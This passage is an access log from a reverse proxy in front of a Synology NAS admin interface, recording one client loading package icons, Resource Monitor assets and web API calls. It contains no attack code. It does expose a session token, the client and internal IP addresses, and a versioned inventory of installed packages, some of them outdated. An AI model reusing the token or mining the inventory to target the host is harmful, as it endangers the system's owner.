"https://nas.profibot.hu/" +[15/Jan/2026:13:51:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Package.Thumb.Server&method=get&version=1&SynoToken=MbvSA7Zte.JE6&name=%22StorageAnalyzer%22&ver=%222.1.0-0421%22&link=%22https%3A%2F%2Fglobal.synologydownload.com%2Fdownload%2FPackage%2Fimg%2FStorageAnalyzer%2F2.1.0-0421%2Fthumb_72.png%22&size=64&bls=true" [Client 84.1.26.27] [Length 3880] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Package.Thumb.Server&method=get&version=1&SynoToken=MbvSA7Zte.JE6&name=%22SynologyPhotos%22&ver=%221.3.4-0340%22&link=%22https%3A%2F%2Fglobal.synologydownload.com%2Fdownload%2FPackage%2Fimg%2FSynologyPhotos%2F1.3.4-0340%2Fthumb_72.png%22&size=64&bls=true" [Client 84.1.26.27] [Length 5797] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Package.Thumb.Server&method=get&version=1&SynoToken=MbvSA7Zte.JE6&name=%22WebDAVServer%22&ver=%222.4.8-10135%22&link=%22https%3A%2F%2Fglobal.synologydownload.com%2Fdownload%2FPackage%2Fimg%2FWebDAVServer%2F2.4.8-10135%2Fthumb_72.png%22&size=64&bls=true" [Client 84.1.26.27] [Length 6326] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Package.Thumb.Server&method=get&version=1&SynoToken=MbvSA7Zte.JE6&name=%22iTunesServer%22&ver=%222.0.0-2723%22&link=%22https%3A%2F%2Fglobal.synologydownload.com%2Fdownload%2FPackage%2Fimg%2FiTunesServer%2F2.0.0-2723%2Fthumb_72.png%22&size=64&bls=true" [Client 84.1.26.27] [Length 5190] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Package.Thumb.Server&method=get&version=1&SynoToken=MbvSA7Zte.JE6&name=%22PHP7.4%22&ver=%227.4.30-0118%22&link=%22https%3A%2F%2Fglobal.synologydownload.com%2Fdownload%2FPackage%2Fimg%2FPHP7.4%2F7.4.30-0118%2Fthumb_72.png%22&size=64&bls=true" [Client 84.1.26.27] [Length 4779] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Package.Thumb.Server&method=get&version=1&SynoToken=MbvSA7Zte.JE6&name=%22ScsiTarget%22&ver=%221.0.6-0266%22&link=%22https%3A%2F%2Fglobal.synologydownload.com%2Fdownload%2FPackage%2Fimg%2FScsiTarget%2F1.0.6-0266%2Fthumb_72.png%22&size=64&bls=true" [Client 84.1.26.27] [Length 4696] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Package.Thumb.Server&method=get&version=1&SynoToken=MbvSA7Zte.JE6&name=%22UniversalViewer%22&ver=%221.0.1-0070%22&link=%22https%3A%2F%2Fglobal.synologydownload.com%2Fdownload%2FPackage%2Fimg%2FUniversalViewer%2F1.0.1-0070%2Fthumb_72.png%22&size=64&bls=true" [Client 84.1.26.27] [Length 6110] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Package.Thumb.Server&method=get&version=1&SynoToken=MbvSA7Zte.JE6&name=%22Perl%22&ver=%225.34.1-0234%22&link=%22https%3A%2F%2Fglobal.synologydownload.com%2Fdownload%2FPackage%2Fimg%2FPerl%2F5.34.1-0234%2Fthumb_72.png%22&size=64&bls=true" [Client 84.1.26.27] [Length 11936] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Package.Thumb.Server&method=get&version=1&SynoToken=MbvSA7Zte.JE6&name=%22RadiusServer%22&ver=%223.0.27-0453%22&link=%22https%3A%2F%2Fglobal.synologydownload.com%2Fdownload%2FPackage%2Fimg%2FRadiusServer%2F3.0.27-0453%2Fthumb_72.png%22&size=64&bls=true" [Client 84.1.26.27] [Length 6276] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Package.Thumb.Server&method=get&version=1&SynoToken=MbvSA7Zte.JE6&name=%22Python2%22&ver=%222.7.18-1004%22&link=%22https%3A%2F%2Fglobal.synologydownload.com%2Fdownload%2FPackage%2Fimg%2FPython2%2F2.7.18-1004%2Fthumb_72.png%22&size=64&bls=true" [Client 84.1.26.27] [Length 3992] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Package.Thumb.Server&method=get&version=1&SynoToken=MbvSA7Zte.JE6&name=%22IDrive%22&ver=%222.06.04-7023%22&link=%22https%3A%2F%2Fglobal.synologydownload.com%2Fdownload%2FPackage%2Fimg%2FIDrive%2F2.06.04-7023%2Fthumb_72.png%22&size=64&bls=true" [Client 84.1.26.27] [Length 6933] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Package.Thumb.Server&method=get&version=1&SynoToken=MbvSA7Zte.JE6&name=%22SecureSignIn%22&ver=%221.0.8-0197%22&link=%22https%3A%2F%2Fglobal.synologydownload.com%2Fdownload%2FPackage%2Fimg%2FSecureSignIn%2F1.0.8-0197%2Fthumb_72.png%22&size=64&bls=true" [Client 84.1.26.27] [Length 20040] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Package.Thumb.Server&method=get&version=1&SynoToken=MbvSA7Zte.JE6&name=%22TextEditor%22&ver=%221.2.4-0245%22&link=%22https%3A%2F%2Fglobal.synologydownload.com%2Fdownload%2FPackage%2Fimg%2FTextEditor%2F1.2.4-0245%2Fthumb_72.png%22&size=64&bls=true" [Client 84.1.26.27] [Length 4971] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Package.Thumb.Server&method=get&version=1&SynoToken=MbvSA7Zte.JE6&name=%22MinimServer%22&ver=%222.2-7001%22&link=%22https%3A%2F%2Fglobal.synologydownload.com%2Fdownload%2FPackage%2Fimg%2FMinimServer%2F2.2-7001%2Fthumb_72.png%22&size=64&bls=true" [Client 84.1.26.27] [Length 4729] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Package.Thumb.Server&method=get&version=1&SynoToken=MbvSA7Zte.JE6&name=%22Node.js_v14%22&ver=%2214.21.3-1014%22&link=%22https%3A%2F%2Fglobal.synologydownload.com%2Fdownload%2FPackage%2Fimg%2FNode.js_v14%2F14.21.3-1014%2Fthumb_72.png%22&size=64&bls=true" [Client 84.1.26.27] [Length 2427] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Package.Thumb.Server&method=get&version=1&SynoToken=MbvSA7Zte.JE6&name=%22Node.js_v18%22&ver=%2218.18.2-0011%22&link=%22https%3A%2F%2Fglobal.synologydownload.com%2Fdownload%2FPackage%2Fimg%2FNode.js_v18%2F18.18.2-0011%2Fthumb_72.png%22&size=64&bls=true" [Client 84.1.26.27] [Length 2427] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Package.Thumb.Server&method=get&version=1&SynoToken=MbvSA7Zte.JE6&name=%22Apache2.4%22&ver=%222.4.54-0125%22&link=%22https%3A%2F%2Fglobal.synologydownload.com%2Fdownload%2FPackage%2Fimg%2FApache2.4%2F2.4.54-0125%2Fthumb_72.png%22&size=64&bls=true" [Client 84.1.26.27] [Length 4321] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Package.Thumb.Server&method=get&version=1&SynoToken=MbvSA7Zte.JE6&name=%22RagicBuilder%22&ver=%225.1.4.1-720250725%22&link=%22https%3A%2F%2Fglobal.synologydownload.com%2Fdownload%2FPackage%2Fimg%2FRagicBuilder%2F5.1.4.1-720250725%2Fthumb_72.png%22&size=64&bls=true" [Client 84.1.26.27] [Length 1374] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Package.Thumb.Server&method=get&version=1&SynoToken=MbvSA7Zte.JE6&name=%22Git%22&ver=%222.39.1-1017%22&link=%22https%3A%2F%2Fglobal.synologydownload.com%2Fdownload%2FPackage%2Fimg%2FGit%2F2.39.1-1017%2Fthumb_72.png%22&size=64&bls=true" [Client 84.1.26.27] [Length 1239] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Package.Thumb.Server&method=get&version=1&SynoToken=MbvSA7Zte.JE6&name=%22NBR-Transporter%22&ver=%2211.1.0.98634-70025%22&link=%22https%3A%2F%2Fglobal.synologydownload.com%2Fdownload%2FPackage%2Fimg%2FNBR-Transporter%2F11.1.0.98634-70025%2Fthumb_72.png%22&size=64&bls=true" [Client 84.1.26.27] [Length 5721] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Package.Thumb.Server&method=get&version=1&SynoToken=MbvSA7Zte.JE6&name=%22phpMyAdmin%22&ver=%225.2.1-1078%22&link=%22https%3A%2F%2Fglobal.synologydownload.com%2Fdownload%2FPackage%2Fimg%2FphpMyAdmin%2F5.2.1-1078%2Fthumb_72.png%22&size=64&bls=true" [Client 84.1.26.27] [Length 5859] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Package.Thumb.Server&method=get&version=1&SynoToken=MbvSA7Zte.JE6&name=%22PHP8.0%22&ver=%228.0.23-0103%22&link=%22https%3A%2F%2Fglobal.synologydownload.com%2Fdownload%2FPackage%2Fimg%2FPHP8.0%2F8.0.23-0103%2Fthumb_72.png%22&size=64&bls=true" [Client 84.1.26.27] [Length 4779] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Package.Thumb.Server&method=get&version=1&SynoToken=MbvSA7Zte.JE6&name=%22WordPress%22&ver=%226.1.1-1062%22&link=%22https%3A%2F%2Fglobal.synologydownload.com%2Fdownload%2FPackage%2Fimg%2FWordPress%2F6.1.1-1062%2Fthumb_72.png%22&size=64&bls=true" [Client 84.1.26.27] [Length 4528] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Package.Thumb.Server&method=get&version=1&SynoToken=MbvSA7Zte.JE6&name=%22PHP7.3%22&ver=%227.3.33-0165%22&link=%22https%3A%2F%2Fglobal.synologydownload.com%2Fdownload%2FPackage%2Fimg%2FPHP7.3%2F7.3.33-0165%2Fthumb_72.png%22&size=64&bls=true" [Client 84.1.26.27] [Length 4779] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Package.Thumb.Server&method=get&version=1&SynoToken=MbvSA7Zte.JE6&name=%22vtigerCRM%22&ver=%227.5.0-1063%22&link=%22https%3A%2F%2Fglobal.synologydownload.com%2Fdownload%2FPackage%2Fimg%2FvtigerCRM%2F7.5.0-1063%2Fthumb_72.png%22&size=64&bls=true" [Client 84.1.26.27] [Length 1894] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Package.Thumb.Server&method=get&version=1&SynoToken=MbvSA7Zte.JE6&name=%22VirtualHere%22&ver=%224.6.6-1466%22&link=%22https%3A%2F%2Fglobal.synologydownload.com%2Fdownload%2FPackage%2Fimg%2FVirtualHere%2F4.6.6-1466%2Fthumb_72.png%22&size=64&bls=true" [Client 84.1.26.27] [Length 5591] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Package.Thumb.Server&method=get&version=1&SynoToken=MbvSA7Zte.JE6&name=%22Tailscale%22&ver=%221.58.2-700058002%22&link=%22https%3A%2F%2Fglobal.synologydownload.com%2Fdownload%2FPackage%2Fimg%2FTailscale%2F1.58.2-700058002%2Fthumb_72.png%22&size=64&bls=true" [Client 84.1.26.27] [Length 4083] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Package.Thumb.Server&method=get&version=1&SynoToken=MbvSA7Zte.JE6&name=%22GoodSync%22&ver=%2212.5.8.8-137500%22&link=%22https%3A%2F%2Fglobal.synologydownload.com%2Fdownload%2FPackage%2Fimg%2FGoodSync%2F12.5.8.8-137500%2Fthumb_72.png%22&size=64&bls=true" [Client 84.1.26.27] [Length 3899] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Package.Thumb.Server&method=get&version=1&SynoToken=MbvSA7Zte.JE6&name=%22PlexMediaServer%22&ver=%221.41.5.9626-70009626%22&link=%22https%3A%2F%2Fglobal.synologydownload.com%2Fdownload%2FPackage%2Fimg%2FPlexMediaServer%2F1.41.5.9626-70009626%2Fthumb_72.png%22&size=64&bls=true" [Client 84.1.26.27] [Length 1918] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Package.Thumb.Server&method=get&version=1&SynoToken=MbvSA7Zte.JE6&name=%22NBR%22&ver=%2211.1.0.98634-70025%22&link=%22https%3A%2F%2Fglobal.synologydownload.com%2Fdownload%2FPackage%2Fimg%2FNBR%2F11.1.0.98634-70025%2Fthumb_72.png%22&size=64&bls=true" [Client 84.1.26.27] [Length 2921] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Package.Thumb.Server&method=get&version=1&SynoToken=MbvSA7Zte.JE6&name=%22DdbBackup%22&ver=%220.1-700350%22&link=%22https%3A%2F%2Fglobal.synologydownload.com%2Fdownload%2FPackage%2Fimg%2FDdbBackup%2F0.1-700350%2Fthumb_72.png%22&size=64&bls=true" [Client 84.1.26.27] [Length 834] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:58 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 65] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:58 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:58 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:59 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:59 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 11038] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:01 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResourceMonitor/images/default/1x/ResourceMonitor_24.png?v=42962-s9" [Client 84.1.26.27] [Length 2024] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:01 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResourceMonitor/images/default/1x/cate_icn_monitor.png?v=5df40b595281f5e07ad954e9aaa2fac2" [Client 84.1.26.27] [Length 891] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/ResourceMonitor/style.css?v=1661421011" +[15/Jan/2026:13:52:01 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResourceMonitor/images/default/1x/cate_icn_task_manager.png?v=3d8628bb5be2edd53403cf143d64163a" [Client 84.1.26.27] [Length 818] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/ResourceMonitor/style.css?v=1661421011" +[15/Jan/2026:13:52:01 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResourceMonitor/images/default/1x/cate_icn_connect.png?v=3db120d36e69b2159a70f30d842fd661" [Client 84.1.26.27] [Length 484] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/ResourceMonitor/style.css?v=1661421011" +[15/Jan/2026:13:52:01 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResourceMonitor/images/default/1x/cate_icn_speed.png?v=3fea306e43ccaa23c48b4fbb4272a309" [Client 84.1.26.27] [Length 1166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/ResourceMonitor/style.css?v=1661421011" +[15/Jan/2026:13:52:01 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResourceMonitor/images/default/1x/cate_icn_setting.png?v=ca5f7aa7f8060b9c8f5122ca08b9d57e" [Client 84.1.26.27] [Length 942] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/ResourceMonitor/style.css?v=1661421011" +[15/Jan/2026:13:52:01 +0000] - 200 200 - GET https nas.profibot.hu "/synoSDSjslib/images/1x/wdheader_bt_restore.png?v=d8b258b1d95b0775869166bf9c929920" [Client 84.1.26.27] [Length 670] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/synoSDSjslib/sds.css?v=1654081517" +[15/Jan/2026:13:52:01 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResourceMonitor/images/default/1x/icn_read_write.png?v=6c426a35f207d068cf795f319ffcf649" [Client 84.1.26.27] [Length 1762] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/ResourceMonitor/style.css?v=1661421011" +[15/Jan/2026:13:52:01 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 74] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:01 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 158] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:01 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResourceMonitor/images/default/svg/checkbox.svg" [Client 84.1.26.27] [Length 5638] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/ResourceMonitor/style.css?v=1661421011" +[15/Jan/2026:13:52:01 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/images/1x/grid_bt_sort.png?v=c55d6006fefa7365d1384970f1e283ad" [Client 84.1.26.27] [Length 443] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/scripts/ext-3/ux/ux-all.css?v=1650348555" +[15/Jan/2026:13:52:01 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 160] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:03 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 616] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:04 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 